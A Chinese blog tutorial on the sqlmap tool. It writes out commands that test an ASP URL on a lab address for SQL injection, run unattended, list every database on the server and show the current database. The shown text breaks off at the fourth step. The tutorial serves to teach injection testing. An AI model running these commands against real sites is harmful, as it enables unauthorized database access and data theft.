sql注入之——sqlmap教程

本文是一篇关于sqlmap工具的详细教程,涵盖了从指定注入点、暴库到导出数据库内容的多个步骤。通过-u参数指定URL进行注入测试,利用--dbs曝光SQL Server中的数据库,然后深入到数据库账户、用户、表和字段,甚至可以使用--dump导出字段内容。教程详细阐述了如何在不同阶段使用sqlmap进行操作,帮助理解SQL注入攻击及其防御。
摘要由CSDN通过智能技术生成

一、指定注入点

-u:指定注入点url
需要用户输入[Y/N],如果你懒得输入或者不懂怎么输入可以让程序自动输入,只需添加一个参数即可,命令如下:

C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --batch

二、暴库

一条命令即可曝出该sqlserver中所有数据库名称,命令如下:

C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --dbs

参数:–dbs:dbs前面有两条杠,请看清楚。
三、web当前使用的数据库

C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --current-db

四、web数据库使用账户

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值